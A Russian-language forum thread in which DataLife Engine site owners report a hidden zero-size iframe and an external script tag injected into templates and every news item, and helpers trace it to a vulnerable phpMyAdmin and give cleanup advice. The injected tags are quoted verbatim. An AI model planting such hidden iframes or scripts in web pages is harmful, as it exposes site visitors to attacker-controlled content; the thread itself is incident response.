Перейти к публикации

Рекомендованные сообщения

Друзья! Сегодня утром заметил что на сайт в main.tpl стоит код <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> .Это мелочи ,код убрал но когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!! Так как в БД около 90000 новостей и во всех новостях был этот код (причем через замену код не убирался) пришлось восстановить более ранний дамп БД.

Такой вопрос:

1.как такое могло произойти?

2.как этого избежать в дальнейшем?

Версия 8.5 ,сайт ru-video.net

Заранее благодарен!

Ссылка на сообщение
Поделиться на других сайтах

hrompic,

Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE

Ссылка на сообщение
Поделиться на других сайтах

hrompic,

Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE

А какая последняя версия phpMyAdmin и как её обновить?

Ссылка на сообщение
Поделиться на других сайтах

hrompic,

phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же.

Ссылка на сообщение
Поделиться на других сайтах

hrompic,

phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же.

У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая?

Ссылка на сообщение
Поделиться на других сайтах

У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая?

да и еще как, сохраните конфигурационный файл, и удалите другие файлы из этой папке, потом залейте новую версию и восстановите конфигурационный файл

До 2.11.10 он дыряв и есть эксплойт.

для 3 линейки там уже тоже порядочно нашли.

Кстати измените пути для доступа к phpMyAdmin на какой нибудь случайный и никому неизвестный, чтобы никто кроме вас не мог знать путь, по которому он распологается.

и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы

Ссылка на сообщение
Поделиться на других сайтах

Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить.

Или еще проще дать права доступа на каталог только для своего IP

причем через замену код не убирался

В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное?

Ссылка на сообщение
Поделиться на других сайтах

и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы

Да начните с /tmp 99%, что шел *.php, a.txt там.

Изменено пользователем Sarvan
Ссылка на сообщение
Поделиться на других сайтах

Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить.

Или еще проще дать права доступа на каталог только для своего IP

причем через замену код не убирался

В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное?

Во всех новостях в окнах полной новости этот код.

Ссылка на сообщение
Поделиться на других сайтах

Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту.

Пишите мне в ICQ я расскажу как можно почистить базу :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту.

Пишите мне в ICQ я расскажу как можно почистить базу :rolleyes:

На пустоту делал-не выходит....К сожалению БД уже перезалил и потерял 400 новостей...

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, hrompic@yandex.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

и соответсвенно дамп не доливается! Какого лимита не хватает подскажите???

Изменено пользователем hrompic
Ссылка на сообщение
Поделиться на других сайтах

Какого лимита не хватает подскажите???

в логах скрипта пишется конкретная причина, нужно по логам смотреть.

Ссылка на сообщение
Поделиться на других сайтах

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается

Зачем заливать через какую-то программу?

Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553

Ссылка на сообщение
Поделиться на других сайтах

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается

Зачем заливать через какую-то программу?

Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553

К сожалению мне это не осилить....Блин,девять часов не могу БД залить дампером....

Ссылка на сообщение
Поделиться на других сайтах

Написали бы мне в ICQ и я давно бы помог :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Написали бы мне в ICQ и я давно бы помог :rolleyes:

Вы знаете как дамп 700 МБ закачать в БД ?

Ссылка на сообщение
Поделиться на других сайтах

Конечно, я же даже ссылку Вам дал и там описано подробно, как это делается :)

Ссылка на сообщение
Поделиться на других сайтах

Друзья!

Огромное спасибо за советы! Шеллы удалил,БД восстановил из дампа,муадмин обновил и изменил путь - хрен теперь найдут.

Всем спасибо за участие!

Ссылка на сообщение
Поделиться на других сайтах
  • 1 месяц спустя...

Здравствуйте.

У меня возникла та же проблема.

Во всех новостях, в конце краткой и полной новости код:

<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>

Поиск и замена результатов не даёт.

Подскажите пожалуйста, как можно почистить базу от этого кода.

Сайт: hdrip.su

Ссылка на сообщение
Поделиться на других сайтах

scodch,

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

Ссылка на сообщение
Поделиться на других сайтах

scodch,

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

Помогло! Большое спасибо! Код удален :D А можно где-то побольше узнать о разделе перестроения новостей? Хотелось бы побольше узнать что и как этот чудо раздел делает :rolleyes:

Изменено пользователем scodch
Ссылка на сообщение
Поделиться на других сайтах

scodch,

этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает.

Ссылка на сообщение
Поделиться на других сайтах

scodch,

этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает.

Понял. Очень полезная функция. Еще раз спасибо!

Ссылка на сообщение
Поделиться на других сайтах

когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!!

А вы не подумали может код ставили в fullstory, а не в базу :rolleyes:

Провертье ваш шаблон а не ковырайтесь в базе данных

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...